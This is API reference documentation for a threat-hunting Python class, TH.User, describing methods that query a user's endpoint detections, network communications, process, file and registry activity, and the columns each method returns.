User

class TH.User(users: str, client_id: str, period: Optional[TH.Core.period.TimePeriod] = TimePeriod())

Bases: Generic[TH.Core.THCollection.T]

Class representing an user
An user can be instantiated by providing the following information:

  • users: Name of the target user

  • client_id: The client identification code

  • period: The current analysis period

User creation examples:

u = User(users='MYDOMAIN\myusername', client_id='000000')
get_bandwidth(muid=None, period=None)
Obtain The used bandwith by this user
The default representation of bandwidth data is a area chart with the values per day
Parameters

  • muid – Limit results to machines in this list

  • period – Query time period. Defaults to today

Returns

Data frame with the resulting bandwidth data

Following columns are provided within the returned dataframe:

  • Date: Date for the bandwith consumption data

  • Outgoing: MBytes sent

  • Incoming: MBytes received

get_blocked(muid: Optional[Union[List[str], str]] = None, file: Optional[Union[str, List[str], Any, List[Any]]] = None, period: Optional[TH.Core.period.TimePeriod] = None, histogram: Optional[TH.Core.histogram.Histogram] = None)Union[pandas.core.frame.DataFrame, TH.Core.THCollection.THCollection]

Obtain user’s blocked elements

Parameters

  • muid – Limit the query results to certain machines

  • file – Limit the query results to certain files (providing File objects)

  • period – Query time period. Defaults to today

  • histogram – Set if the histogram over the data is required (defaults to None)

Returns

Machine’s detections represented as a list of Block instances.

If histogram is required, returning values depends on the provided histogram configuration.
Otherwise, following columns are provided within the returned dataframe:

  • DateTime: Date of the detection

  • ClientId: Target client

  • Muid: Target machine

  • LoggedUser: User that performed the detected action

  • ChildMd5: File hash for the detected file

  • ChildPath: File path for the detected file

  • ChildFilename: File name for the detected file

  • ParentMd5: File hash for the parent process file

  • ParentPath: File path for the parent process file

  • ParentFilename: File name for the parent process file

  • WinningTech: Winning technology (the one that performed the detecion)

  • DetectionId: Detection identification code

  • Action: Performed action over the file

get_communications(muid: Optional[Union[List[str], str]] = None, file: Optional[Union[str, List[str], Any, List[Any]]] = None, period: Optional[TH.Core.period.TimePeriod] = None, protocol: Optional[str] = None, port: Optional[str] = None, iptype: Optional[str] = None, direction: Optional[str] = None, ips: Optional[str] = None, top: Optional[int] = None, histogram: Optional[TH.Core.histogram.Histogram] = None)Union[pandas.core.frame.DataFrame, TH.Core.THCollection.THCollection]
Obtain user’s communications
The default representation of a user’s communications through the print_dataframe() method is world
map with colored dots (out of the geolocalization)
Parameters

  • period – Query time period. Defaults to today

  • histogram – Set if the histogram over the data is required (defaults to None)

  • muid – Limit the query results to certain source machines

  • file – Limit the query results to certain files (providing File objects)

  • protocol – Limit the query result to certain protocols (‘ICMP’, ‘IGMP’, ‘RFCOMM’, ‘TCP’, ‘RDP’, ‘UDP’, ‘ICMPV6’, ‘RM’)

  • ports – Limit the query result to certain ports (port = number or [‘FTP’, ‘SSH’, ‘TELNET’, ‘SMTP’, ‘HTTP’, ‘POP3’, ‘HTTPS’, ‘RDP’])

  • iptype – Limit the query result to certain IP type (iptype = ‘Public’|’Private’)

  • direction – Limit the query result to certain direction (direction = ‘Incoming’|’Outgoing’)

  • ips – Limit the query results to certain ip addresses

  • top – Limit the query result to certain number of rows

Returns

Machine’s communications represented as a list of Connection instances.

If histogram is required, returning values depends on the provided histogram configuration.
Otherwise, following columns are provided within the returned dataframe:

  • DateTime: Date and time of the connection

  • Date: Date of the connection

  • Muid: Machine for the connection

  • LoggedUser: User affected by the connection

  • ParentFilename: Process (name) affected by the connection

  • ParentPid: Process (pid) affected by the connection

  • RemoteIp: The remote IP address

  • RemotePort: Connection port

  • LocalIp: The local IP of the machine when the connection was stablished

  • LocalPort: The local IP port

  • Protocol: The communication protocol

  • Direction: Incoming / Outgoing

  • Ipv4Status: Internal / External

get_detections(muid: Optional[Union[List[str], str]] = None, file: Optional[Union[str, List[str], Any, List[Any]]] = None, period: Optional[TH.Core.period.TimePeriod] = None, histogram: Optional[TH.Core.histogram.Histogram] = None)Union[pandas.core.frame.DataFrame, TH.Core.THCollection.THCollection]

Obtain user’s deteccions

Parameters

  • muid – Limit the query results to certain machines

  • file – Limit the query results to certain files (providing File objects)

  • period – Query time period. Defaults to today

  • histogram – Set if the histogram over the data is required (defaults to None)

Returns

Machine’s detections represented as a list of Detect instances.

If histogram is required, returning values depends on the provided histogram configuration.
Otherwise, following columns are provided within the returned dataframe:

  • DateTime: Date of the detection

  • ClientId: Target client

  • Muid: Target machine

  • LoggedUser: User that performed the detected action

  • ChildMd5: File hash for the detected file

  • ChildPath: File path for the detected file

  • ChildFilename: File name for the detected file

  • ParentMd5: File hash for the parent process file

  • ParentPath: File path for the parent process file

  • ParentFilename: File name for the parent process file

  • WinningTech: Winning technology (the one that performed the detecion)

  • DetectionId: Detection identification code

  • Action: Performed action over the file

get_executions(file: Optional[Union[str, List[str], Any, List[Any]]] = None, muid: Optional[Union[List[str], str]] = None, kind: Optional[Union[List[str], str]] = None, operation: Optional[Union[List[str], str]] = None, attributes: Optional[Union[List[str], str]] = None, command: Optional[Union[List[str], str]] = None, period: Optional[TH.Core.period.TimePeriod] = None, histogram: Optional[TH.Core.histogram.Histogram] = None)Union[TH.Core.THCollection.THCollection, pandas.core.frame.DataFrame]
Obtain user’s actions over processes
Parameters

  • period – Query time period. Defaults to today

  • histogram – Set if the histogram over the data is required (defaults to None)

  • file – Limit the results to those actions affecting provided file (providing File objects)

  • muid – Limit the results to those actions affecting provided machines

  • kind – Limit results by the application type [‘interpreter’, ‘remoteaccess’, ‘admintool’, ‘hackingtool’] or action [‘userallowed’]

  • operation – Limit results by the operation type [‘create’, ‘kill’, ‘thread’, ‘load’]

  • attributes – Limit the results by the operation attributes (OR’ed values of [ATTR_REMOTE, ATTR_EXTERNAL, ATTR_FRESHUNKNOWN, ATTR_LANSHARED])

  • command – Limit results to thos containing the given command line

Available operations are:

  • create: Process creation operations

  • kill: Kill process operations

  • thread: Remote threads creation operations

  • load: Load library operations

Returns

Machine’s processes actions in period as a list of Process instances.

If histogram is required, returning values depends on the provided histogram configuration.
Otherwise, following columns are provided within the returned Process instances:

  • DateTime: timestamp for the operation

  • Muid: Target machine

  • LoggedUser: User that performed the logged action

  • ChildFilename: Child process (name)

  • ChildPath: Child process (path)

  • ChildMd5: Child process (file md5 hash)

  • ChildPid: Child Process (pid)

  • ParentFilename: Parent process (name)

  • ParentMd5: Parent process (file md5 hash)

  • ParentPid: Parent Process (pid)

  • CommandLine: Command line for process creation events

  • RemoteIp: Origin IP for file creation events from remote machines

  • Operation: Operation type

  • RemoteSession: True if action is performed from a remote session

  • External: The file comes from outside

  • FreshUnknown: This file is new along Panda community

  • LanShared: The file comes from outside (inside the local network)

get_files(file: Optional[Union[str, List[str], Any, List[Any]]] = None, muid: Optional[Union[List[str], str]] = None, kind: Optional[str] = None, operation: Optional[str] = None, attributes: Optional[str] = None, period: Optional[TH.Core.period.TimePeriod] = None, histogram: Optional[TH.Core.histogram.Histogram] = None)Union[TH.Core.histogram.Histogram, TH.Core.THCollection.THCollection]
Obtain user’s actions over files
Parameters

  • period – Query time period. Defaults to today

  • histogram – Set if the histogram over the data is required (defaults to None)

  • file – Limit the results to those actions affecting provided file

  • muid – Limit the results to those actions affecting provided machines

  • kind – Limit results by the application type [‘interpreter’, ‘remoteaccess’, ‘admintool’, ‘hackingtool’] or action [‘userallowed’]

  • operation – Limit results by the operation type [‘create’, ‘modify’, ‘delete’, ‘rename’, ‘folder’, ‘newcmp’, ‘opencmp’, ‘access’, ‘script’]

  • attributes – Limit the results by the operation attributes (OR’ed values of [ATTR_REMOTE, ATTR_EXTERNAL, ATTR_FRESHUNKNOWN, ATTR_LANSHARED])

Available operations are:

  • create: File (PE) creation operations

  • modify: File (PE) modification operations

  • delete: File (PE) deletion operations

  • rename: File (PE) rename operations

  • folder: Folder creation operations

  • newcmp: CMP files creation operations

  • opencmp: CMP files open operations

  • access: Data access operations

  • script: Operations over no PE / script files

Returns

Machine’s file actions in period as a list of File instances.

If histogram is required, returning values depends on the provided histogram configuration.
Otherwise, following columns are provided within the returned File instances:

  • DateTime: timestamp for the operation

  • Muid: Target machine

  • LoggedUser: User that performed the logged action

  • ChildFilename: Child process (name)

  • ChildPath: Child process (path)

  • ChildMd5: Child process (file md5 hash)

  • ChildPid: Child Process (pid)

  • ParentFilename: Parent process (name)

  • ParentMd5: Parent process (file md5 hash)

  • ParentPid: Parent Process (pid)

  • CommandLine: Command line for process creation events

  • RemoteIp: Origin IP for file creation events from remote machines

  • Operation: Operation type

  • RemoteSession: True if action is performed from a remote session

  • External: The file comes from outside

  • FreshUnknown: This file is new along Panda community

  • LanShared: The file comes from outside (inside the local network)

get_machines(period: Optional[TH.Core.period.TimePeriod] = None, histogram: Optional[TH.Core.histogram.Histogram] = None)Union[pandas.core.frame.DataFrame, Any]
Obtain machines where User was logged in
Parameters

  • period – Query time period. Defaults to today

  • histogram – Set if the histogram over the data is required (defaults to None)

Returns

A list of machines represented as Machine instances.

If histogram is required, returning values depends on the provided histogram configuration.
Otherwise, following columns are provided within the returned dataframe:

  • Muid: The MUID for the returned machine

get_registry(file: Optional[Union[str, List[str], Any, List[Any]]] = None, muid: Optional[Union[List[str], str]] = None, kind: Optional[str] = None, operation: Optional[str] = None, period: Optional[TH.Core.period.TimePeriod] = None, histogram: Optional[TH.Core.histogram.Histogram] = None)Union[pandas.core.frame.DataFrame, TH.Core.THCollection.THCollection]
Obtain user’s actions over registry keys
Parameters

  • period – Query time period. Defaults to today

  • histogram – Set if the histogram over the data is required (defaults to None)

  • file – Limit the query results to certain files (providing File objects)

  • muid – Limit the results to those actions affecting provided machines

  • kind – Limit results by the application type [‘interpreter’, ‘remoteaccess’, ‘admintool’, ‘hackingtool’] or action [‘userallowed’]

  • operation – Limit results by the operation type [‘create’, ‘modify’, ‘access’]

Available operations are:

  • create: Registry key creation operations

  • modify: Registry key modification operations

Returns

Machine’s registry actions in period as a list of Registry instances.

If histogram is required, returning values depends on the provided histogram configuration.
Otherwise, following columns are provided within the returned dataframe:

  • DateTime: timestamp for the operation

  • Muid: Target machine

  • LoggedUser: User that performed the logged action

  • ChildFilename: Child process (name)

  • ChildPath: Child process (path)

  • ChildMd5: Child process (file md5 hash)

  • ChildPid: Child Process (pid)

  • ParentFilename: Parent process (name)

  • ParentMd5: Parent process (file md5 hash)

  • ParentPid: Parent Process (pid)

  • CommandLine: Command line for process creation events

  • RemoteIp: Origin IP for file creation events from remote machines

  • Operation: Operation type

get_timetable(muid: Optional[Union[List[str], str]] = None, period: Optional[TH.Core.period.TimePeriod] = None)pandas.core.frame.DataFrame
Obtain The distribution of user actions over time (hours per weekday)
The default representation for the timetable is a heatmap with coloured cells per weekday and hour
Parameters

  • period – Query time period. Defaults to today

  • muid – Limit results to machines in this list

Returns

Dataframe with the actions distriution over time

Following columns are provided within the returned dataframe:

  • LoggedUser: The user under analysis

  • Weekday: The analyzed weekday [1..7]

  • Hour: The analyzed hour [0..23]

  • AvgActions: The average number of actions (any kind) in the analyzed weekday and hour

  • StdActions: The standard deviation of actions (any kind) in the analyzed weekday and hour

property name
Returns

This user name